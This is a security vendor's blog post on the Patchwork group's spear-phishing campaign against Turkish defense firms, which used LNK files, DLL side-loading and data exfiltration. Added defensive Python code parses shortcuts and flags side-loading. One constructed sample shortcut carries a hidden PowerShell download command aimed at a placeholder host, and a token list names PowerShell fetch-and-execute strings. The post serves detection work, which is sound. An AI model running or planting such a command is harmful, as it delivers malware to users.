India-Linked Group Targets Turkish Defense

Posted on September 3, 2025, updated September 26, 2025, by Finstein.ai

Patchwork uses fake invites with LNK files to breach missile contractors for intel
28 July 2025

The India-linked threat actor Patchwork (also tracked as APT-C-09, Dropping Elephant and Operation Hangover) has launched a spear-phishing campaign against Turkish defense contractors, aiming to collect sensitive intelligence on unmanned vehicle systems and missile programs.

Geopolitical Context

The timing aligns with deepening defense cooperation between Türkiye and Pakistan, and ongoing India-Pakistan tensions, indicating possible geopolitical motivation.

Attack Method

  • Victims received phishing emails containing Windows shortcut (.LNK) files disguised as conference invitations.
  • When opened, the LNK file runs PowerShell commands that download additional malware from expouav[.]org, a domain registered in June 2025.
  • A fake PDF mimicking a UAV conference (hosted on the legitimate waset[.]org site) is displayed to distract the user.
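The delivery vector above is a shortcut whose embedded command line launches PowerShell. The following is an added example for defenders, not code from the original post or from the vendor report it summarizes: a minimal parser for the public MS-SHLLINK layout (76-byte ShellLinkHeader, optional LinkTargetIDList and LinkInfo blocks, then the StringData fields) followed by a triage check that flags interpreter launches, hidden windows, encoded commands and fetches in the argument string. The sample shortcuts are constructed by `build_lnk()` for the demonstration; they are not artifacts from the campaign, and the token list is an assumption you would tune to your own environment.

```python
"""Minimal Shell Link (.lnk) parser with a triage check on embedded arguments.

Added illustrative example, not code from the original post or the vendor
report. Layout follows MS-SHLLINK: ShellLinkHeader, optional LinkTargetIDList
and LinkInfo, then StringData (name, relative path, working dir, arguments,
icon location). Samples are constructed below, not captured from the campaign.
"""
import struct

# LinkFlags bits in the ShellLinkHeader (flags live at offset 0x14).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Argument substrings that should route a shortcut to an analyst rather than
# a user (assumed starter list; tune for your environment).
SUSPICIOUS_TOKENS = ("powershell", "-enc", "-w hidden", "downloadstring",
                     "invoke-webrequest", "iex", "http")


def _read_string(buf, pos, unicode_):
    """Read one StringData field: 2-byte char count, then the characters."""
    count = struct.unpack_from("<H", buf, pos)[0]
    pos += 2
    if unicode_:
        raw = buf[pos:pos + count * 2]
        return raw.decode("utf-16-le"), pos + count * 2
    raw = buf[pos:pos + count]
    return raw.decode("latin-1"), pos + count


def parse_lnk(buf):
    """Return the StringData fields present in a .lnk as a dict."""
    if len(buf) < HEADER_SIZE or buf[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", buf, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        # IDListSize excludes its own 2-byte size field.
        pos += 2 + struct.unpack_from("<H", buf, pos)[0]
    if flags & HAS_LINK_INFO:
        # LinkInfoSize includes its own 4-byte size field.
        pos += struct.unpack_from("<I", buf, pos)[0]
    unicode_ = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            fields[name], pos = _read_string(buf, pos, unicode_)
    return fields


def triage_lnk(buf):
    """Return the suspicious tokens found in the shortcut's argument string."""
    args = parse_lnk(buf).get("arguments", "").lower()
    return [t for t in SUSPICIOUS_TOKENS if t in args]


def build_lnk(relative_path=None, arguments=None):
    """Constructed fixture builder: header plus Unicode StringData only."""
    flags = IS_UNICODE
    body = b""
    if relative_path is not None:
        flags |= HAS_RELATIVE_PATH
        body += struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    if arguments is not None:
        flags |= HAS_ARGUMENTS
        body += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LINK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    return bytes(header) + body


# Constructed samples: a "conference invite" that launches a hidden PowerShell
# fetch, and an ordinary document shortcut for comparison.
SAMPLE_MALICIOUS = build_lnk(
    relative_path="..\\..\\Windows\\System32\\cmd.exe",
    arguments='/c powershell -w hidden -c "Invoke-WebRequest http://example.invalid/x"')
SAMPLE_BENIGN = build_lnk(relative_path="Agenda.pdf")

if __name__ == "__main__":
    for label, sample in (("invite", SAMPLE_MALICIOUS), ("agenda", SAMPLE_BENIGN)):
        print(label, parse_lnk(sample), triage_lnk(sample))
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes so the StringData offsets stay correct. Token matching is a first-pass filter for mail-gateway or endpoint triage, not a verdict; anything that hits should go to sandboxing or manual review.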

Infection Chain (Five Stages)

  1. A malicious DLL file is downloaded.
  2. The DLL is run through DLL side-loading, in which a legitimate, trusted application loads the malicious DLL in place of the library it expects.
  3. The malware then executes shellcode that performs host reconnaissance.
  4. It captures screenshots and collects system data.
  5. Collected information is sent to the attacker’s remote server.
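Stage 2 of the chain, side-loading through a trusted binary, leaves a characteristic trace in image-load telemetry: a signed executable loading an unsigned DLL that sits beside it in a user-writable directory. The following is an added example of that heuristic, not code from the original post. The event records are constructed for the demonstration and shaped loosely like a few fields of a Sysmon ImageLoaded event; the field names (`Image`, `ImageLoaded`, `ImageSigned`, `ImageLoadedSigned`) and the writable-directory list are assumptions for the example.

```python
"""Heuristic triage of image-load telemetry for DLL side-loading.

Added illustrative example, not code from the original post. It encodes the
pattern behind stage 2 of the chain: a signed, legitimate executable loading
an unsigned DLL from its own directory when that directory is user-writable.
Event records and field names are constructed for this example.
"""
from pathlib import PureWindowsPath

# Directories an unprivileged user (or a phishing-delivered payload) can
# write to; assumed list, extend for your estate.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\temp\\",
    "c:\\windows\\temp\\",
)


def is_user_writable(path):
    """True if the path sits under a directory standard users can write to."""
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def side_loading_candidates(events):
    """Return (process, dll) pairs matching the side-loading heuristic."""
    hits = []
    for ev in events:
        proc = PureWindowsPath(ev["Image"])
        dll = PureWindowsPath(ev["ImageLoaded"])
        same_dir = str(proc.parent).lower() == str(dll.parent).lower()
        if (ev["ImageSigned"] and not ev["ImageLoadedSigned"]
                and same_dir and is_user_writable(ev["ImageLoaded"])):
            hits.append((ev["Image"], ev["ImageLoaded"]))
    return hits


# Constructed telemetry: one side-loading pattern among benign loads. The
# last record shows why the writable-directory test matters: unsigned vendor
# DLLs under Program Files are common and would otherwise flood the queue.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Temp\Invite\viewer.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\Invite\version.dll",
     "ImageSigned": True, "ImageLoadedSigned": False},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\Invite\viewer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "ImageSigned": True, "ImageLoadedSigned": True},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "ImageSigned": True, "ImageLoadedSigned": True},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll",
     "ImageSigned": True, "ImageLoadedSigned": False},
]

if __name__ == "__main__":
    for proc, dll in side_loading_candidates(SAMPLE_EVENTS):
        print(f"review: {proc} loaded unsigned {dll}")
```

The heuristic deliberately ignores what the DLL is named; the signal is the combination of a trusted loader, an untrusted library and a location the user could have written. Pairing it with the subsequent stages (screenshot capture, outbound connections from the same process) raises confidence before anyone is paged.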

The tooling shows a shift from the group's earlier 64-bit DLL payloads to new 32-bit executables, with command-and-control (C2) traffic that imitates legitimate websites to evade detection.

Broader Campaign Indicators

Patchwork has been active since at least 2009, targeting entities across South Asia and China. In 2025, they were also linked to attacks on Chinese universities and infrastructure, using a Rust-based loader and a C# trojan called Protego.

A May 2025 report from QiAnXin also suggested infrastructure overlaps between Patchwork and the DoNot Team (APT-Q-38), hinting at possible collaboration or shared tooling.

Prevent the hack before it happens. Upgrade and lock it down.
praveen@finstein.ai | https://cyber.finstein.ai/

Source: Patchwork Targets Turkish Defense Firms with Spear-Phishing Using Malicious LNK Files

#PatchworkAPT #DroppingElephant #APT09 #OperationHangover #CyberEspionage #APTActivity #PhishingCampaign #MalwareCampaign #CyberThreats #DLLSideLoading
